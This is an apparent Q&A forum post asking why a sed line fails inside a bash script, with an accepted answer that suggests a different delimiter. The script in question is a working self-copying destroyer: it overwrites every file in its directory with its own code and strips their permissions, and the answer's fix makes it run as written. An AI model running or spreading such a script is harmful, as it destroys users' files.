# sed won't work in bash script

Tags: bash, sed

I'm making a script that copies itself into all the other files in the directory it is executed. (simply as an exercise)

```
#!/bin/bash

naz=$0
list='2e5vff5f8fgg8gs5gs8ggr48gr8grs84gr8448.txt'
find -type f > $list
sed -i "/$list/d" $list
sed -i "/"$naz"/d" $list

while read infest
do
  cp "$naz" "$infest" 2>/dev/null
  chmod 100 "$infest"  2>/dev/null
done < $list

chmod 744 $naz
rm $list
```

It does what i want it to do, but the bug is in the line whee i try to remove the program itself from the list. The terminal gives me this:

```
sed: -e expression #1, char 16: unterminated `s' command
```

I executed the comands by hand in a terminal window and it works just fine, but why wont it work while in a script?

Answer (score 3, accepted):

Problem appears to be in this line:

```
sed -i "/"$naz"/d" $list
```

As variable `$naz` which is representing `$0` may contain `/` and that would cause `sed` to complain as you're using `/` as delimiter.

To fix the problem, you can use alternative delimiter in `sed`:

```
sed -i "\#$naz#d" "$list"
```

assuming your filename doesn't have `#` character otherwise `sed` allows using control characters also for delimiters.